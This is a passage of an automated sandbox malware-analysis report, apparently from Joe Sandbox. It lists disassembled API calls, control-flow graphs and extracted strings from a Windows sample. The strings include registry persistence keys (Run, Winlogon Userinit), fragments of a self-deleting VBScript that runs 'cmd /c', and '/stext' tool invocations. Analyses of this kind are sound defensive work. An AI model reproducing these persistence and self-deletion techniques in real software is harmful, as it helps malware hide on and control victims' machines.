                                                  • Part of subcall function 00406079: TerminateThread.KERNEL32(004045F8,00000000,00000000,004137F0,00407AF8,00000000,004137F0,6C9BB310), ref: 0040608E
                                                  • Part of subcall function 00406079: UnhookWindowsHookEx.USER32(00000000), ref: 00406097
                                                  • Part of subcall function 00406079: TerminateThread.KERNEL32(004045D8,00000000), ref: 004060A7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407C4A
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00407C52
                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00407C6E
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419BA0,004137F0), ref: 00407C83
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00407C99
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 00407CA0
                                                • _wgetenv.MSVCRT ref: 00407CB0
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00407CBB
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407CC6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407CD1
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00407CE3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00407CF3
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407CFE
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00407D1D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00407D2D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407D3A
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407D46
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407D4F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407D58
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407D61
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00414294), ref: 00407D80
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407D8B
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407D98
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407DA4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407DAD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407DB6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407DBF
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00407DD3
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419BA0,004137F0), ref: 00407DDB
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",00419BA0,00414294), ref: 00407DF2
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00414294), ref: 00407DFF
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00414294), ref: 00407E0B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00414294), ref: 00407E14
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00414294), ref: 00407E1D
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041417C), ref: 00407E34
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 00407E4B
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407E56
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407E63
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407E70
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407E7C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407E85
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407E8E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407E97
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407EA0
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407EA9
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00407EB7
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407EC3
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00407ECD
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407ED9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 00407EF2
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00407EFF
                                                • exit.MSVCRT ref: 00407F0B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407F14
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407F1D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407F26
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@$D@2@@std@@D@std@@G@1@@V01@V10@Y?$basic_string@$V01@@$FileTerminateV10@@$??9std@@AttributesD@1@@ThreadV10@0@$?length@?$basic_string@?size@?$basic_string@DeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                                • String ID: """, 0$")$C:\WINDOWS\system32\userinit.exe$CreateObject("WScript.Shell").Run "cmd /c ""$EXEpath$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$\update.vbs$explorer.exe$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                • API String ID: 4243007326-4041463378
                                                • Opcode ID: eb44e725194e894f9b572d3815d7776a7dd0cc8e13041306d404d8cb2220338f
                                                • Instruction ID: 7eb18ff911e69f875c99ca2e03b36bf716f7dbf3fec6dff7932b6293dbf80dd2
                                                • Opcode Fuzzy Hash: eb44e725194e894f9b572d3815d7776a7dd0cc8e13041306d404d8cb2220338f
                                                • Instruction Fuzzy Hash: 61C14571900109AFDB00EFA0ED59EEE7B7CAB54306F1040BAF506A21E1DB795F49CB69
                                                Function 0040A2E7 Relevance: 147.4, APIs: 83, Strings: 1, Instructions: 399filesleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 437 40a2e7-40a555 GetModuleFileNameW ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z * 3 call 411023 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4080e4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 411023 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4080e4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 411023 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4080e4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40efb2 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40efb2 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 40efb2 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 4 456 40a557-40a571 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 411980 437->456 459 40a573-40a584 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ DeleteFileW 456->459 460 40a586-40a5a0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 411980 456->460 459->460 463 40a5a2-40a5b3 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ DeleteFileW 460->463 464 40a5b5-40a5cf ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ call 411980 460->464 463->464 467 40a5d1-40a5e0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ DeleteFileW 464->467 468 40a5e2-40a5e6 464->468 467->468 469 40a5f2-40a601 Sleep 468->469 470 40a5e8-40a5ec 468->470 469->456 471 40a607-40a61a ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 469->471 470->469 472 40a5ee-40a5f0 470->472 473 40a620-40a6c0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 6 call 402049 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 471->473 474 40a6c5-40a762 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 6 call 402049 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 4 471->474 472->469 472->471 479 40a765-40a7db ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 3 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 8 473->479 474->479
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A301
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A318
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A325
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A332
                                                  • Part of subcall function 00411023: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A341,?), ref: 00411032
                                                  • Part of subcall function 00411023: time.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A341,?), ref: 0041104A
                                                  • Part of subcall function 00411023: srand.MSVCRT ref: 00411057
                                                  • Part of subcall function 00411023: rand.MSVCRT ref: 0041106B
                                                  • Part of subcall function 00411023: rand.MSVCRT ref: 0041107F
                                                  • Part of subcall function 00411023: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,0040A341,?), ref: 00411092
                                                  • Part of subcall function 00411023: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0040A341,?,?,?,?,?,?,?,0040A341,?), ref: 004110A2
                                                  • Part of subcall function 00411023: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,0040A341,?), ref: 004110AB
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A344
                                                  • Part of subcall function 004080E4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00408E3E,?,?), ref: 004080F4
                                                  • Part of subcall function 004080E4: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00408E3E,?,?), ref: 0040810B
                                                  • Part of subcall function 004080E4: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00408123
                                                  • Part of subcall function 004080E4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0040812C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A35F
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A371
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A38C
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A39E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A3B9
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A3C2
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,0041409C,00000000), ref: 0040A3E3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040A3F5
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A402
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040A40F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A419
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A42A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A433
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A43C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A445
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A44E
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,0041409C,00000000), ref: 0040A465
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040A477
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A484
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040A491
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A49B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A4AC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A4B5
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A4BE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A4C7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A4D0
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,0041409C,00000000), ref: 0040A4E7
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040A4F9
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A506
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040A513
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A51D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A52E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A537
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A540
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A549
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A561
                                                  • Part of subcall function 00411980: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A57D
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040A584
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A590
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A5AC
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040A5B3
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A5BF
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040A5D9
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040A5E0
                                                • Sleep.KERNEL32(000001F4), ref: 0040A5F7
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413984), ref: 0040A610
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?,00419288,?,00419288,?), ref: 0040A644
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00419288,?), ref: 0040A651
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,?), ref: 0040A65E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,?), ref: 0040A66B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00419288,?), ref: 0040A678
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00419288), ref: 0040A682
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040A699
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A6A2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A6AB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A6B4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A765
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A771
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A77D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A789
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A792
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A79B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7A4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7AD
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7B6
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7BF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7C8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
